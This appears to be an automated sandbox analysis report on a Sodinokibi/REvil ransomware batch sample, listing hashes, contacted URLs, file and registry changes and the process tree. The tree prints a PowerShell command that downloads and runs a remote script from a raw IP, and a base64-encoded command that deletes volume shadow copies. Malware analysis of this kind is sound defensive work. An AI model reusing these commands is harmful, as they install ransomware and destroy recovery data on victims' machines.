Analysis
-
max time kernel
148s -
max time network
143s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
06-05-2020 04:10
Static task
static1
Behavioral task
behavioral1
Sample
Me1udSVB.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
Me1udSVB.bat
Resource
win10v200430
General
-
Target
Me1udSVB.bat
-
Size
196B
-
MD5
92449589b75088e99026c11efc758a3f
-
SHA1
4a9dc4d04a9850b99af10ba65ea589c4ae0565d6
-
SHA256
f1f555330316b69cf9d50580d41a4b4372689e6d37c90bd945b94140fde7680c
-
SHA512
b9d4481f45a1acf8a62c195d8a1212d221d3a086fd401a352d349c7ae9b3c9ee31e95d383a0aa6ae03561e8e44dc2acd85c1c76acf6beff68d76d23dd7f4d1be
Malware Config
Extracted
http://185.103.242.78/pastes/Me1udSVB
Extracted
C:\ckg4v-read-me.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/246EAF4AF2A85C1E
http://decryptor.cc/246EAF4AF2A85C1E
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeBackupPrivilege 1620 vssvc.exe Token: SeRestorePrivilege 1620 vssvc.exe Token: SeAuditPrivilege 1620 vssvc.exe Token: SeTakeOwnershipPrivilege 1460 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 320 powershell.exe 320 powershell.exe -
Makes http(s) request 33 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 14 https://hrabritelefon.hr/content/temp/iqhissnw.gif HTTP URL 105 https://fitnessbazaar.com/news/image/fzbb.jpg HTTP URL 148 https://drnice.de/news/assets/rjza.gif HTTP URL 176 https://sauschneider.info/content/pictures/mqou.jpg HTTP URL 10 http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP URL 99 https://femxarxa.cat/include/pictures/urzpcnmhds.png HTTP URL 111 https://juneauopioidworkgroup.org/admin/temp/uxvjtjggsdzo.png HTTP URL 117 https://smale-opticiens.nl/news/temp/mdlrkc.png HTTP URL 146 https://www.triactis.com/page-403.php HTTP URL 169 https://yourobgyn.net/uploads/game/fkfyys.gif HTTP URL 16 http://apps.identrust.com/roots/dstrootcax3.p7c HTTP URL 76 https://gaiam.nl/static/image/ciqoxyiz.gif HTTP URL 159 https://americafirstcommittee.org/news/game/cnka.jpg HTTP URL 12 https://bestbet.com/uploads/temp/hyilje.png HTTP URL 144 https://triactis.com/admin/pics/sz.jpg HTTP URL 103 https://vesinhnha.com.vn/news/image/tdcc.png HTTP URL 142 https://allfortheloveofyou.com/data/image/vmipll.jpg HTTP URL 155 https://eadsmurraypugh.com/data/graphic/cx.png HTTP URL 181 https://oemands.dk/content/graphic/ihrq.jpg HTTP URL 185 https://allentownpapershow.com/admin/assets/urlo.jpg HTTP URL 59 https://antonmack.de/admin/assets/rxqlyqibqiunhpgi.jpg HTTP URL 34 https://familypark40.com/data/temp/bett.gif HTTP URL 20 https://pasvenska.se/data/graphic/nwuits.gif HTTP URL 28 https://patrickfoundation.net/content/images/ajnctd.jpg HTTP URL 42 https://tarotdeseidel.com/data/images/mvjaxf.jpg HTTP URL 55 https://tsklogistik.eu/wp-content/graphic/rmmdcefo.jpg HTTP URL 57 https://www.tsklogistik.eu/wp-content/graphic/rmmdcefo.jpg HTTP URL 93 https://101gowrie.com/data/graphic/uwjjfk.gif HTTP URL 166 https://geoffreymeuli.com/wp-content/image/ddowqmonmpugjj.gif HTTP URL 183 https://jasonbaileystudio.com/uploads/pics/mjmnupiojiku.jpg HTTP URL 3 http://185.103.242.78/pastes/Me1udSVB HTTP URL 157 https://smessier.com/wp-content/assets/qstpmbkipfsk.jpg HTTP URL 85 https://huissier-creteil.com/uploads/pics/qayvdp.jpg -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1356 wrote to memory of 1460 1356 cmd.exe powershell.exe PID 1460 wrote to memory of 320 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 320 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 320 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 320 1460 powershell.exe powershell.exe -
Blacklisted process makes network request 102 IoCs
Processes:
powershell.exeflow pid process 3 1460 powershell.exe 5 1460 powershell.exe 6 1460 powershell.exe 8 1460 powershell.exe 10 1460 powershell.exe 12 1460 powershell.exe 14 1460 powershell.exe 16 1460 powershell.exe 18 1460 powershell.exe 20 1460 powershell.exe 22 1460 powershell.exe 23 1460 powershell.exe 25 1460 powershell.exe 26 1460 powershell.exe 28 1460 powershell.exe 30 1460 powershell.exe 32 1460 powershell.exe 34 1460 powershell.exe 36 1460 powershell.exe 37 1460 powershell.exe 39 1460 powershell.exe 40 1460 powershell.exe 42 1460 powershell.exe 44 1460 powershell.exe 46 1460 powershell.exe 49 1460 powershell.exe 50 1460 powershell.exe 52 1460 powershell.exe 53 1460 powershell.exe 55 1460 powershell.exe 57 1460 powershell.exe 59 1460 powershell.exe 61 1460 powershell.exe 62 1460 powershell.exe 64 1460 powershell.exe 65 1460 powershell.exe 67 1460 powershell.exe 68 1460 powershell.exe 70 1460 powershell.exe 71 1460 powershell.exe 73 1460 powershell.exe 74 1460 powershell.exe 76 1460 powershell.exe 78 1460 powershell.exe 79 1460 powershell.exe 81 1460 powershell.exe 82 1460 powershell.exe 85 1460 powershell.exe 87 1460 powershell.exe 88 1460 powershell.exe 90 1460 powershell.exe 91 1460 powershell.exe 93 1460 powershell.exe 97 1460 powershell.exe 99 1460 powershell.exe 101 1460 powershell.exe 103 1460 powershell.exe 105 1460 powershell.exe 108 1460 powershell.exe 109 1460 powershell.exe 111 1460 powershell.exe 113 1460 powershell.exe 114 1460 powershell.exe 117 1460 powershell.exe -
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\v3.5\ckg4v-read-me.txt powershell.exe File opened for modification \??\c:\program files\ConnectSet.kix powershell.exe File opened for modification \??\c:\program files\InitializeReceive.css powershell.exe File opened for modification \??\c:\program files\InvokeSave.pub powershell.exe File opened for modification \??\c:\program files\LockSelect.ppsm powershell.exe File opened for modification \??\c:\program files\RegisterDebug.php powershell.exe File created \??\c:\program files\ckg4v-read-me.txt powershell.exe File created \??\c:\program files (x86)\ckg4v-read-me.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\ckg4v-read-me.txt powershell.exe File opened for modification \??\c:\program files\SuspendRestore.3gp powershell.exe File opened for modification \??\c:\program files\AssertRemove.eps powershell.exe File opened for modification \??\c:\program files\StepConvert.mpeg powershell.exe File opened for modification \??\c:\program files\SwitchMount.pptm powershell.exe File opened for modification \??\c:\program files\TraceBackup.m1v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ckg4v-read-me.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromResize.dotx powershell.exe File opened for modification \??\c:\program files\StepSave.dotm powershell.exe File opened for modification \??\c:\program files\UseAssert.svgz powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\k06kzgr9.bmp" powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Me1udSVB.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Me1udSVB');Invoke-LHEITCCTUVUCD;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Modifies system certificate store
PID:1460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:320
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1620